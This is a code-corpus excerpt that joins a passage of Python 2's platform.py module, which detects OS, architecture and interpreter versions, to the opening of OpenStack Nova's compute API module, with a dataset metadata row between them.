(6, 3): "2012ServerR2",
(6, None): "post2012ServerR2",
}
def _get_real_winver(maj, min, build):
if maj < 6 or (maj == 6 and min < 2):
return maj, min, build
from ctypes import (c_buffer, POINTER, byref, create_unicode_buffer,
Structure, WinDLL, _Pointer)
from ctypes.wintypes import DWORD, HANDLE
class VS_FIXEDFILEINFO(Structure):
_fields_ = [
("dwSignature", DWORD),
("dwStrucVersion", DWORD),
("dwFileVersionMS", DWORD),
("dwFileVersionLS", DWORD),
("dwProductVersionMS", DWORD),
("dwProductVersionLS", DWORD),
("dwFileFlagsMask", DWORD),
("dwFileFlags", DWORD),
("dwFileOS", DWORD),
("dwFileType", DWORD),
("dwFileSubtype", DWORD),
("dwFileDateMS", DWORD),
("dwFileDateLS", DWORD),
]
class PVS_FIXEDFILEINFO(_Pointer):
_type_ = VS_FIXEDFILEINFO
kernel32 = WinDLL('kernel32')
version = WinDLL('version')
# We will immediately double the length up to MAX_PATH, but the
# path may be longer, so we retry until the returned string is
# shorter than our buffer.
name_len = actual_len = 130
while actual_len == name_len:
name_len *= 2
name = create_unicode_buffer(name_len)
actual_len = kernel32.GetModuleFileNameW(HANDLE(kernel32._handle),
name, len(name))
if not actual_len:
return maj, min, build
size = version.GetFileVersionInfoSizeW(name, None)
if not size:
return maj, min, build
ver_block = c_buffer(size)
if (not version.GetFileVersionInfoW(name, None, size, ver_block) or
not ver_block):
return maj, min, build
pvi = PVS_FIXEDFILEINFO()
if not version.VerQueryValueW(ver_block, "", byref(pvi), byref(DWORD())):
return maj, min, build
maj = pvi.contents.dwProductVersionMS >> 16
min = pvi.contents.dwProductVersionMS & 0xFFFF
build = pvi.contents.dwProductVersionLS >> 16
return maj, min, build
def win32_ver(release='', version='', csd='', ptype=''):
try:
from sys import getwindowsversion
except ImportError:
return release, version, csd, ptype
try:
from winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE
except ImportError:
from _winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE
winver = getwindowsversion()
maj, min, build = _get_real_winver(*winver[:3])
version = '{0}.{1}.{2}'.format(maj, min, build)
release = (_WIN32_CLIENT_RELEASES.get((maj, min)) or
_WIN32_CLIENT_RELEASES.get((maj, None)) or
release)
# getwindowsversion() reflect the compatibility mode Python is
# running under, and so the service pack value is only going to be
# valid if the versions match.
if winver[:2] == (maj, min):
try:
csd = 'SP{}'.format(winver.service_pack_major)
except AttributeError:
if csd[:13] == 'Service Pack ':
csd = 'SP' + csd[13:]
# VER_NT_SERVER = 3
if getattr(winver, 'product_type', None) == 3:
release = (_WIN32_SERVER_RELEASES.get((maj, min)) or
_WIN32_SERVER_RELEASES.get((maj, None)) or
release)
key = None
try:
key = OpenKeyEx(HKEY_LOCAL_MACHINE,
r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
ptype = QueryValueEx(key, 'CurrentType')[0]
except:
pass
finally:
if key:
CloseKey(key)
return release, version, csd, ptype
def _mac_ver_lookup(selectors,default=None):
from gestalt import gestalt
import MacOS
l = []
append = l.append
for selector in selectors:
try:
append(gestalt(selector))
except (RuntimeError, MacOS.Error):
append(default)
return l
def _bcd2str(bcd):
return hex(bcd)[2:]
def _mac_ver_gestalt():
"""
Thanks to Mark R. Levinson for mailing documentation links and
code examples for this function. Documentation for the
gestalt() API is available online at:
http://www.rgaros.nl/gestalt/
"""
# Check whether the version info module is available
try:
import gestalt
import MacOS
except ImportError:
return None
# Get the infos
sysv,sysa = _mac_ver_lookup(('sysv','sysa'))
# Decode the infos
if sysv:
major = (sysv & 0xFF00) >> 8
minor = (sysv & 0x00F0) >> 4
patch = (sysv & 0x000F)
if (major, minor) >= (10, 4):
# the 'sysv' gestald cannot return patchlevels
# higher than 9. Apple introduced 3 new
# gestalt codes in 10.4 to deal with this
# issue (needed because patch levels can
# run higher than 9, such as 10.4.11)
major,minor,patch = _mac_ver_lookup(('sys1','sys2','sys3'))
release = '%i.%i.%i' %(major, minor, patch)
else:
release = '%s.%i.%i' % (_bcd2str(major),minor,patch)
if sysa:
machine = {0x1: '68k',
0x2: 'PowerPC',
0xa: 'i386'}.get(sysa,'')
versioninfo=('', '', '')
return release,versioninfo,machine
def _mac_ver_xml():
fn = '/System/Library/CoreServices/SystemVersion.plist'
if not os.path.exists(fn):
return None
try:
import plistlib
except ImportError:
return None
pl = plistlib.readPlist(fn)
release = pl['ProductVersion']
versioninfo=('', '', '')
machine = os.uname()[4]
if machine in ('ppc', 'Power Macintosh'):
# for compatibility with the gestalt based code
machine = 'PowerPC'
return release,versioninfo,machine
def mac_ver(release='',versioninfo=('','',''),machine=''):
""" Get MacOS version information and return it as tuple (release,
versioninfo, machine) with versioninfo being a tuple (version,
dev_stage, non_release_version).
Entries which cannot be determined are set to the parameter values
which default to ''. All tuple entries are strings.
"""
# First try reading the information from an XML file which should
# always be present
info = _mac_ver_xml()
if info is not None:
return info
# If that doesn't work for some reason fall back to reading the
# information using gestalt calls.
info = _mac_ver_gestalt()
if info is not None:
return info
# If that also doesn't work return the default values
return release,versioninfo,machine
def _java_getprop(name,default):
from java.lang import System
try:
value = System.getProperty(name)
if value is None:
return default
return value
except AttributeError:
return default
def java_ver(release='',vendor='',vminfo=('','',''),osinfo=('','','')):
""" Version interface for Jython.
Returns a tuple (release,vendor,vminfo,osinfo) with vminfo being
a tuple (vm_name,vm_release,vm_vendor) and osinfo being a
tuple (os_name,os_version,os_arch).
Values which cannot be determined are set to the defaults
given as parameters (which all default to '').
"""
# Import the needed APIs
try:
import java.lang
except ImportError:
return release,vendor,vminfo,osinfo
vendor = _java_getprop('java.vendor', vendor)
release = _java_getprop('java.version', release)
vm_name, vm_release, vm_vendor = vminfo
vm_name = _java_getprop('java.vm.name', vm_name)
vm_vendor = _java_getprop('java.vm.vendor', vm_vendor)
vm_release = _java_getprop('java.vm.version', vm_release)
vminfo = vm_name, vm_release, vm_vendor
os_name, os_version, os_arch = osinfo
os_arch = _java_getprop('java.os.arch', os_arch)
os_name = _java_getprop('java.os.name', os_name)
os_version = _java_getprop('java.os.version', os_version)
osinfo = os_name, os_version, os_arch
return release, vendor, vminfo, osinfo
### System name aliasing
def system_alias(system,release,version):
""" Returns (system,release,version) aliased to common
marketing names used for some systems.
It also does some reordering of the information in some cases
where it would otherwise cause confusion.
"""
if system == 'Rhapsody':
# Apple's BSD derivative
# XXX How can we determine the marketing release number ?
return 'MacOS X Server',system+release,version
elif system == 'SunOS':
# Sun's OS
if release < '5':
# These releases use the old name SunOS
return system,release,version
# Modify release (marketing release = SunOS release - 3)
l = string.split(release,'.')
if l:
try:
major = int(l[0])
except ValueError:
pass
else:
major = major - 3
l[0] = str(major)
release = string.join(l,'.')
if release < '6':
system = 'Solaris'
else:
# XXX Whatever the new SunOS marketing name is...
system = 'Solaris'
elif system == 'IRIX64':
# IRIX reports IRIX64 on platforms with 64-bit support; yet it
# is really a version and not a different platform, since 32-bit
# apps are also supported..
system = 'IRIX'
if version:
version = version + ' (64bit)'
else:
version = '64bit'
elif system in ('win32','win16'):
# In case one of the other tricks
system = 'Windows'
return system,release,version
### Various internal helpers
def _platform(*args):
""" Helper to format the platform string in a filename
compatible format e.g. "system-version-machine".
"""
# Format the platform string
platform = string.join(
map(string.strip,
filter(len, args)),
'-')
# Cleanup some possible filename obstacles...
replace = string.replace
platform = replace(platform,' ','_')
platform = replace(platform,'/','-')
platform = replace(platform,'\\','-')
platform = replace(platform,':','-')
platform = replace(platform,';','-')
platform = replace(platform,'"','-')
platform = replace(platform,'(','-')
platform = replace(platform,')','-')
# No need to report 'unknown' information...
platform = replace(platform,'unknown','')
# Fold '--'s and remove trailing '-'
while 1:
cleaned = replace(platform,'--','-')
if cleaned == platform:
break
platform = cleaned
while platform[-1] == '-':
platform = platform[:-1]
return platform
def _node(default=''):
""" Helper to determine the node name of this machine.
"""
try:
import socket
except ImportError:
# No sockets...
return default
try:
return socket.gethostname()
except socket.error:
# Still not working...
return default
# os.path.abspath is new in Python 1.5.2:
if not hasattr(os.path,'abspath'):
def _abspath(path,
isabs=os.path.isabs,join=os.path.join,getcwd=os.getcwd,
normpath=os.path.normpath):
if not isabs(path):
path = join(getcwd(), path)
return normpath(path)
else:
_abspath = os.path.abspath
def _follow_symlinks(filepath):
""" In case filepath is a symlink, follow it until a
real file is reached.
"""
filepath = _abspath(filepath)
while os.path.islink(filepath):
filepath = os.path.normpath(
os.path.join(os.path.dirname(filepath),os.readlink(filepath)))
return filepath
def _syscmd_uname(option,default=''):
""" Interface to the system's uname command.
"""
if sys.platform in ('dos','win32','win16','os2'):
# XXX Others too ?
return default
try:
f = os.popen('uname %s 2> %s' % (option, DEV_NULL))
except (AttributeError,os.error):
return default
output = string.strip(f.read())
rc = f.close()
if not output or rc:
return default
else:
return output
def _syscmd_file(target,default=''):
""" Interface to the system's file command.
The function uses the -b option of the file command to have it
ommit the filename in its output and if possible the -L option
to have the command follow symlinks. It returns default in
case the command should fail.
"""
# We do the import here to avoid a bootstrap issue.
# See c73b90b6dadd changeset.
#
# [..]
# ranlib libpython2.7.a
# gcc -o python \
# Modules/python.o \
# libpython2.7.a -lsocket -lnsl -ldl -lm
# Traceback (most recent call last):
# File "./setup.py", line 8, in <module>
# from platform import machine as platform_machine
# File "[..]/build/Lib/platform.py", line 116, in <module>
# import sys,string,os,re,subprocess
# File "[..]/build/Lib/subprocess.py", line 429, in <module>
# import select
# ImportError: No module named select
import subprocess
if sys.platform in ('dos','win32','win16','os2'):
# XXX Others too ?
return default
target = _follow_symlinks(target)
try:
proc = subprocess.Popen(['file', target],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
except (AttributeError,os.error):
return default
output = proc.communicate()[0]
rc = proc.wait()
if not output or rc:
return default
else:
return output
### Information about the used architecture
# Default values for architecture; non-empty strings override the
# defaults given as parameters
_default_architecture = {
'win32': ('','WindowsPE'),
'win16': ('','Windows'),
'dos': ('','MSDOS'),
}
_architecture_split = re.compile(r'[\s,]').split
def architecture(executable=sys.executable,bits='',linkage=''):
""" Queries the given executable (defaults to the Python interpreter
binary) for various architecture information.
Returns a tuple (bits,linkage) which contains information about
the bit architecture and the linkage format used for the
executable. Both values are returned as strings.
Values that cannot be determined are returned as given by the
parameter presets. If bits is given as '', the sizeof(pointer)
(or sizeof(long) on Python version < 1.5.2) is used as
indicator for the supported pointer size.
The function relies on the system's "file" command to do the
actual work. This is available on most if not all Unix
platforms. On some non-Unix platforms where the "file" command
does not exist and the executable is set to the Python interpreter
binary defaults from _default_architecture are used.
"""
# Use the sizeof(pointer) as default number of bits if nothing
# else is given as default.
if not bits:
import struct
try:
size = struct.calcsize('P')
except struct.error:
# Older installations can only query longs
size = struct.calcsize('l')
bits = str(size*8) + 'bit'
# Get data from the 'file' system command
if executable:
output = _syscmd_file(executable, '')
else:
output = ''
if not output and \
executable == sys.executable:
# "file" command did not return anything; we'll try to provide
# some sensible defaults then...
if sys.platform in _default_architecture:
b, l = _default_architecture[sys.platform]
if b:
bits = b
if l:
linkage = l
return bits, linkage
# Split the output into a list of strings omitting the filename
fileout = _architecture_split(output)[1:]
if 'executable' not in fileout:
# Format not supported
return bits,linkage
# Bits
if '32-bit' in fileout:
bits = '32bit'
elif 'N32' in fileout:
# On Irix only
bits = 'n32bit'
elif '64-bit' in fileout:
bits = '64bit'
# Linkage
if 'ELF' in fileout:
linkage = 'ELF'
elif 'PE' in fileout:
# E.g. Windows uses this format
if 'Windows' in fileout:
linkage = 'WindowsPE'
else:
linkage = 'PE'
elif 'COFF' in fileout:
linkage = 'COFF'
elif 'MS-DOS' in fileout:
linkage = 'MSDOS'
else:
# XXX the A.OUT format also falls under this class...
pass
return bits,linkage
### Portable uname() interface
_uname_cache = None
def uname():
""" Fairly portable uname interface. Returns a tuple
of strings (system,node,release,version,machine,processor)
identifying the underlying platform.
Note that unlike the os.uname function this also returns
possible processor information as an additional tuple entry.
Entries which cannot be determined are set to ''.
"""
global _uname_cache
no_os_uname = 0
if _uname_cache is not None:
return _uname_cache
processor = ''
# Get some infos from the builtin os.uname API...
try:
system,node,release,version,machine = os.uname()
except AttributeError:
no_os_uname = 1
if no_os_uname or not filter(None, (system, node, release, version, machine)):
# Hmm, no there is either no uname or uname has returned
#'unknowns'... we'll have to poke around the system then.
if no_os_uname:
system = sys.platform
release = ''
version = ''
node = _node()
machine = ''
use_syscmd_ver = 1
# Try win32_ver() on win32 platforms
if system == 'win32':
release,version,csd,ptype = win32_ver()
if release and version:
use_syscmd_ver = 0
# Try to use the PROCESSOR_* environment variables
# available on Win XP and later; see
# http://support.microsoft.com/kb/888731 and
# http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PROCESSI.HTM
if not machine:
# WOW64 processes mask the native architecture
if "PROCESSOR_ARCHITEW6432" in os.environ:
machine = os.environ.get("PROCESSOR_ARCHITEW6432", '')
else:
machine = os.environ.get('PROCESSOR_ARCHITECTURE', '')
if not processor:
processor = os.environ.get('PROCESSOR_IDENTIFIER', machine)
# Try the 'ver' system command available on some
# platforms
if use_syscmd_ver:
system,release,version = _syscmd_ver(system)
# Normalize system to what win32_ver() normally returns
# (_syscmd_ver() tends to return the vendor name as well)
if system == 'Microsoft Windows':
system = 'Windows'
elif system == 'Microsoft' and release == 'Windows':
# Under Windows Vista and Windows Server 2008,
# Microsoft changed the output of the ver command. The
# release is no longer printed. This causes the
# system and release to be misidentified.
system = 'Windows'
if '6.0' == version[:3]:
release = 'Vista'
else:
release = ''
# In case we still don't know anything useful, we'll try to
# help ourselves
if system in ('win32','win16'):
if not version:
if system == 'win32':
version = '32bit'
else:
version = '16bit'
system = 'Windows'
elif system[:4] == 'java':
release,vendor,vminfo,osinfo = java_ver()
system = 'Java'
version = string.join(vminfo,', ')
if not version:
version = vendor
# System specific extensions
if system == 'OpenVMS':
# OpenVMS seems to have release and version mixed up
if not release or release == '0':
release = version
version = ''
# Get processor information
try:
import vms_lib
except ImportError:
pass
else:
csid, cpu_number = vms_lib.getsyi('SYI$_CPU',0)
if (cpu_number >= 128):
processor = 'Alpha'
else:
processor = 'VAX'
if not processor:
# Get processor information from the uname system command
processor = _syscmd_uname('-p','')
#If any unknowns still exist, replace them with ''s, which are more portable
if system == 'unknown':
system = ''
if node == 'unknown':
node = ''
if release == 'unknown':
release = ''
if version == 'unknown':
version = ''
if machine == 'unknown':
machine = ''
if processor == 'unknown':
processor = ''
# normalize name
if system == 'Microsoft' and release == 'Windows':
system = 'Windows'
release = 'Vista'
_uname_cache = system,node,release,version,machine,processor
return _uname_cache
### Direct interfaces to some of the uname() return values
def system():
""" Returns the system/OS name, e.g. 'Linux', 'Windows' or 'Java'.
An empty string is returned if the value cannot be determined.
"""
return uname()[0]
def node():
""" Returns the computer's network name (which may not be fully
qualified)
An empty string is returned if the value cannot be determined.
"""
return uname()[1]
def release():
""" Returns the system's release, e.g. '2.2.0' or 'NT'
An empty string is returned if the value cannot be determined.
"""
return uname()[2]
def version():
""" Returns the system's release version, e.g. '#3 on degas'
An empty string is returned if the value cannot be determined.
"""
return uname()[3]
def machine():
""" Returns the machine type, e.g. 'i386'
An empty string is returned if the value cannot be determined.
"""
return uname()[4]
def processor():
""" Returns the (true) processor name, e.g. 'amdk6'
An empty string is returned if the value cannot be
determined. Note that many platforms do not provide this
information or simply return the same value as for machine(),
e.g. NetBSD does this.
"""
return uname()[5]
### Various APIs for extracting information from sys.version
_sys_version_parser = re.compile(
r'([\w.+]+)\s*' # "version<space>"
r'\(#?([^,]+)' # "(#buildno"
r'(?:,\s*([\w ]*)' # ", builddate"
r'(?:,\s*([\w :]*))?)?\)\s*' # ", buildtime)<space>"
r'\[([^\]]+)\]?') # "[compiler]"
_ironpython_sys_version_parser = re.compile(
r'IronPython\s*'
'([\d\.]+)'
'(?: \(([\d\.]+)\))?'
' on (.NET [\d\.]+)')
# IronPython covering 2.6 and 2.7
_ironpython26_sys_version_parser = re.compile(
r'([\d.]+)\s*'
'\(IronPython\s*'
'[\d.]+\s*'
'\(([\d.]+)\) on ([\w.]+ [\d.]+(?: \(\d+-bit\))?)\)'
)
_pypy_sys_version_parser = re.compile(
r'([\w.+]+)\s*'
'\(#?([^,]+),\s*([\w ]+),\s*([\w :]+)\)\s*'
'\[PyPy [^\]]+\]?')
_sys_version_cache = {}
def _sys_version(sys_version=None):
""" Returns a parsed version of Python's sys.version as tuple
(name, version, branch, revision, buildno, builddate, compiler)
referring to the Python implementation name, version, branch,
revision, build number, build date/time as string and the compiler
identification string.
Note that unlike the Python sys.version, the returned value
for the Python version will always include the patchlevel (it
defaults to '.0').
The function returns empty strings for tuple entries that
cannot be determined.
sys_version may be given to parse an alternative version
string, e.g. if the version was read from a different Python
interpreter.
"""
# Get the Python version
if sys_version is None:
sys_version = sys.version
# Try the cache first
result = _sys_version_cache.get(sys_version, None)
if result is not None:
return result
# Parse it
if 'IronPython' in sys_version:
# IronPython
name = 'IronPython'
if sys_version.startswith('IronPython'):
match = _ironpython_sys_version_parser.match(sys_version)
else:
match = _ironpython26_sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse IronPython sys.version: %s' %
repr(sys_version))
version, alt_version, compiler = match.groups()
buildno = ''
builddate = ''
elif sys.platform.startswith('java'):
# Jython
name = 'Jython'
match = _sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse Jython sys.version: %s' %
repr(sys_version))
version, buildno, builddate, buildtime, _ = match.groups()
if builddate is None:
builddate = ''
compiler = sys.platform
elif "PyPy" in sys_version:
# PyPy
name = "PyPy"
match = _pypy_sys_version_parser.match(sys_version)
if match is None:
raise ValueError("failed to parse PyPy sys.version: %s" %
repr(sys_version))
version, buildno, builddate, buildtime = match.groups()
compiler = ""
else:
# CPython
match = _sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse CPython sys.version: %s' %
repr(sys_version))
version, buildno, builddate, buildtime, compiler = \
match.groups()
name = 'CPython'
if builddate is None:
builddate = ''
elif buildtime:
builddate = builddate + ' ' + buildtime
if hasattr(sys, 'subversion'):
# sys.subversion was added in Python 2.5
_, branch, revision = sys.subversion
else:
branch = ''
revision = ''
# Add the patchlevel version if missing
l = string.split(version, '.')
if len(l) == 2:
l.append('0')
version = string.join(l, '.')
# Build and cache the result
result = (name, version, branch, revision, buildno, builddate, compiler)
_sys_version_cache[sys_version] = result
return result
def python_implementation():
""" Returns a string identifying the Python implementation.
Currently, the following implementations are identified:
'CPython' (C implementation of Python),
'IronPython' (.NET implementation of Python),
'Jython' (Java implementation of Python),
'PyPy' (Python implementation of Python).
"""
return _sys_version()[0]
def python_version():
""" Returns the Python version as string 'major.minor.patchlevel'
Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).
"""
return _sys_version()[1]
def python_version_tuple():
""" Returns the Python version as tuple (major, minor, patchlevel)
of strings.
Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).
"""
return tuple(string.split(_sys_version()[1], '.'))
def python_branch():
""" Returns a string identifying the Python implementation
branch.
For CPython this is the Subversion branch from which the
Python binary was built.
If not available, an empty string is returned.
"""
return _sys_version()[2]
def python_revision():
""" Returns a string identifying the Python implementation
revision.
For CPython this is the Subversion revision from which the
Python binary was built.
If not available, an empty string is returned.
"""
return _sys_version()[3]
def python_build():
""" Returns a tuple (buildno, builddate) stating the Python
build number and date as strings.
"""
return _sys_version()[4:6]
def python_compiler():
""" Returns a string identifying the compiler used for compiling
Python.
"""
return _sys_version()[6]
### The Opus Magnum of platform strings :-)
_platform_cache = {}
def platform(aliased=0, terse=0):
""" Returns a single string identifying the underlying platform
with as much useful information as possible (but no more :).
The output is intended to be human readable rather than
machine parseable. It may look different on different
platforms and this is intended.
If "aliased" is true, the function will use aliases for
various platforms that report system names which differ from
their common names, e.g. SunOS will be reported as
Solaris. The system_alias() function is used to implement
this.
Setting terse to true causes the function to return only the
absolute minimum information needed to identify the platform.
"""
result = _platform_cache.get((aliased, terse), None)
if result is not None:
return result
# Get uname information and then apply platform specific cosmetics
# to it...
system,node,release,version,machine,processor = uname()
if machine == processor:
processor = ''
if aliased:
system,release,version = system_alias(system,release,version)
if system == 'Windows':
# MS platforms
rel,vers,csd,ptype = win32_ver(version)
if terse:
platform = _platform(system,release)
else:
platform = _platform(system,release,version,csd)
elif system in ('Linux',):
# Linux based systems
distname,distversion,distid = dist('')
if distname and not terse:
platform = _platform(system,release,machine,processor,
'with',
distname,distversion,distid)
else:
# If the distribution name is unknown check for libc vs. glibc
libcname,libcversion = libc_ver(sys.executable)
platform = _platform(system,release,machine,processor,
'with',
libcname+libcversion)
elif system == 'Java':
# Java platforms
r,v,vminfo,(os_name,os_version,os_arch) = java_ver()
if terse or not os_name:
platform = _platform(system,release,version)
else:
platform = _platform(system,release,version,
'on',
os_name,os_version,os_arch)
elif system == 'MacOS':
# MacOS platforms
if terse:
platform = _platform(system,release)
else:
platform = _platform(system,release,machine)
else:
# Generic handler
if terse:
platform = _platform(system,release)
else:
bits,linkage = architecture(sys.executable)
platform = _platform(system,release,machine,processor,bits,linkage)
_platform_cache[(aliased, terse)] = platform
return platform
### Command line interface
if __name__ == '__main__':
# Default is to print the aliased verbose platform string
terse = ('terse' in sys.argv or '--terse' in sys.argv)
aliased = (not 'nonaliased' in sys.argv and not '--nonaliased' in sys.argv)
print platform(aliased,terse)
sys.exit(0)
| mit | -3,123,977,640,802,781,000 | 30.921459 | 82 | 0.56988 | false |
berrange/nova | nova/compute/api.py | 1 | 179341 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012-2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all requests relating to compute resources (e.g. guest VMs,
networking and storage of VMs, and compute hosts on which they run)."""
import base64
import functools
import re
import string
import uuid
from oslo.config import cfg
import six
from nova import availability_zones
from nova import block_device
from nova.cells import opts as cells_opts
from nova.compute import flavors
from nova.compute import instance_actions
from nova.compute import power_state
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova.consoleauth import rpcapi as consoleauth_rpcapi
from nova import crypto
from nova.db import base
from nova import exception
from nova import hooks
from nova.i18n import _
from nova.i18n import _LE
from nova import image
from nova import keymgr
from nova import network
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova.network.security_group import security_group_base
from nova import notifications
from nova import objects
from nova.objects import base as obj_base
from nova.objects import quotas as quotas_obj
from nova.objects import security_group as security_group_obj
from nova.openstack.common import excutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import strutils
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova.pci import pci_request
import nova.policy
from nova import quota
from nova import rpc
from nova import servicegroup
from nova import utils
from nova.virt import hardware
from nova import volume
LOG = logging.getLogger(__name__)
get_notifier = functools.partial(rpc.get_notifier, service='compute')
wrap_exception = functools.partial(exception.wrap_exception,
get_notifier=get_notifier)
compute_opts = [
cfg.BoolOpt('allow_resize_to_same_host',
default=False,
help='Allow destination machine to match source for resize. '
'Useful when testing in single-host environments.'),
cfg.BoolOpt('allow_migrate_to_same_host',
default=False,
help='Allow migrate machine to the same host. '
'Useful when testing in single-host environments.'),
cfg.StrOpt('default_schedule_zone',
help='Availability zone to use when user doesn\'t specify one'),
cfg.ListOpt('non_inheritable_image_properties',
default=['cache_in_nova',
'bittorrent'],
help='These are image properties which a snapshot should not'
' inherit from an instance'),
cfg.StrOpt('null_kernel',
default='nokernel',
help='Kernel image that indicates not to use a kernel, but to '
'use a raw disk image instead'),
cfg.StrOpt('multi_instance_display_name_template',
default='%(name)s-%(uuid)s',
help='When creating multiple instances with a single request '
'using the os-multiple-create API extension, this '
'template will be used to build the display name for '
'each instance. The benefit is that the instances '
'end up with different hostnames. To restore legacy '
'behavior of every instance having the same name, set '
'this option to "%(name)s". Valid keys for the '
'template are: name, uuid, count.'),
cfg.IntOpt('max_local_block_devices',
default=3,
help='Maximum number of devices that will result '
'in a local image being created on the hypervisor node. '
'Setting this to 0 means nova will allow only '
'boot from volume. A negative number means unlimited.'),
]
ephemeral_storage_encryption_group = cfg.OptGroup(
name='ephemeral_storage_encryption',
title='Ephemeral storage encryption options')
ephemeral_storage_encryption_opts = [
cfg.BoolOpt('enabled',
default=False,
help='Whether to encrypt ephemeral storage'),
cfg.StrOpt('cipher',
default='aes-xts-plain64',
help='The cipher and mode to be used to encrypt ephemeral '
'storage. Which ciphers are available ciphers depends '
'on kernel support. See /proc/crypto for the list of '
'available options.'),
cfg.IntOpt('key_size',
default=512,
help='The bit length of the encryption key to be used to '
'encrypt ephemeral storage (in XTS mode only half of '
'the bits are used for encryption key)')
]
CONF = cfg.CONF
CONF.register_opts(compute_opts)
CONF.register_group(ephemeral_storage_encryption_group)
CONF.register_opts(ephemeral_storage_encryption_opts,
group='ephemeral_storage_encryption')
CONF.import_opt('compute_topic', 'nova.compute.rpcapi')
CONF.import_opt('enable', 'nova.cells.opts', group='cells')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
MAX_USERDATA_SIZE = 65535
QUOTAS = quota.QUOTAS
RO_SECURITY_GROUPS = ['default']
VIDEO_RAM = 'hw_video:ram_max_mb'
def check_instance_state(vm_state=None, task_state=(None,),
must_have_launched=True):
"""Decorator to check VM and/or task state before entry to API functions.
If the instance is in the wrong state, or has not been successfully
started at least once the wrapper will raise an exception.
"""
if vm_state is not None and not isinstance(vm_state, set):
vm_state = set(vm_state)
if task_state is not None and not isinstance(task_state, set):
task_state = set(task_state)
def outer(f):
@functools.wraps(f)
def inner(self, context, instance, *args, **kw):
if vm_state is not None and instance['vm_state'] not in vm_state:
raise exception.InstanceInvalidState(
attr='vm_state',
instance_uuid=instance['uuid'],
state=instance['vm_state'],
method=f.__name__)
if (task_state is not None and
instance['task_state'] not in task_state):
raise exception.InstanceInvalidState(
attr='task_state',
instance_uuid=instance['uuid'],
state=instance['task_state'],
method=f.__name__)
if must_have_launched and not instance['launched_at']:
raise exception.InstanceInvalidState(
attr=None,
not_launched=True,
instance_uuid=instance['uuid'],
state=instance['vm_state'],
method=f.__name__)
return f(self, context, instance, *args, **kw)
return inner
return outer
def check_instance_host(function):
@functools.wraps(function)
def wrapped(self, context, instance, *args, **kwargs):
if not instance['host']:
raise exception.InstanceNotReady(instance_id=instance['uuid'])
return function(self, context, instance, *args, **kwargs)
return wrapped
def check_instance_lock(function):
@functools.wraps(function)
def inner(self, context, instance, *args, **kwargs):
if instance['locked'] and not context.is_admin:
raise exception.InstanceIsLocked(instance_uuid=instance['uuid'])
return function(self, context, instance, *args, **kwargs)
return inner
def policy_decorator(scope):
"""Check corresponding policy prior of wrapped method to execution."""
def outer(func):
@functools.wraps(func)
def wrapped(self, context, target, *args, **kwargs):
check_policy(context, func.__name__, target, scope)
return func(self, context, target, *args, **kwargs)
return wrapped
return outer
wrap_check_policy = policy_decorator(scope='compute')
wrap_check_security_groups_policy = policy_decorator(
scope='compute:security_groups')
def check_policy(context, action, target, scope='compute'):
_action = '%s:%s' % (scope, action)
nova.policy.enforce(context, _action, target)
def check_instance_cell(fn):
def _wrapped(self, context, instance, *args, **kwargs):
self._validate_cell(instance, fn.__name__)
return fn(self, context, instance, *args, **kwargs)
_wrapped.__name__ = fn.__name__
return _wrapped
def _diff_dict(orig, new):
"""Return a dict describing how to change orig to new. The keys
correspond to values that have changed; the value will be a list
of one or two elements. The first element of the list will be
either '+' or '-', indicating whether the key was updated or
deleted; if the key was updated, the list will contain a second
element, giving the updated value.
"""
# Figure out what keys went away
result = dict((k, ['-']) for k in set(orig.keys()) - set(new.keys()))
# Compute the updates
for key, value in new.items():
if key not in orig or value != orig[key]:
result[key] = ['+', value]
return result
class API(base.Base):
"""API for interacting with the compute manager."""
def __init__(self, image_api=None, network_api=None, volume_api=None,
security_group_api=None, **kwargs):
self.image_api = image_api or image.API()
self.network_api = network_api or network.API()
self.volume_api = volume_api or volume.API()
self.security_group_api = (security_group_api or
openstack_driver.get_openstack_security_group_driver())
self.consoleauth_rpcapi = consoleauth_rpcapi.ConsoleAuthAPI()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self._compute_task_api = None
self.servicegroup_api = servicegroup.API()
self.notifier = rpc.get_notifier('compute', CONF.host)
if CONF.ephemeral_storage_encryption.enabled:
self.key_manager = keymgr.API()
super(API, self).__init__(**kwargs)
@property
def compute_task_api(self):
if self._compute_task_api is None:
# TODO(alaski): Remove calls into here from conductor manager so
# that this isn't necessary. #1180540
from nova import conductor
self._compute_task_api = conductor.ComputeTaskAPI()
return self._compute_task_api
@property
def cell_type(self):
try:
return getattr(self, '_cell_type')
except AttributeError:
self._cell_type = cells_opts.get_cell_type()
return self._cell_type
def _cell_read_only(self, cell_name):
"""Is the target cell in a read-only mode?"""
# FIXME(comstud): Add support for this.
return False
def _validate_cell(self, instance, method):
if self.cell_type != 'api':
return
cell_name = instance['cell_name']
if not cell_name:
raise exception.InstanceUnknownCell(
instance_uuid=instance['uuid'])
if self._cell_read_only(cell_name):
raise exception.InstanceInvalidState(
attr="vm_state",
instance_uuid=instance['uuid'],
state="temporary_readonly",
method=method)
def _record_action_start(self, context, instance, action):
objects.InstanceAction.action_start(context, instance['uuid'],
action, want_result=False)
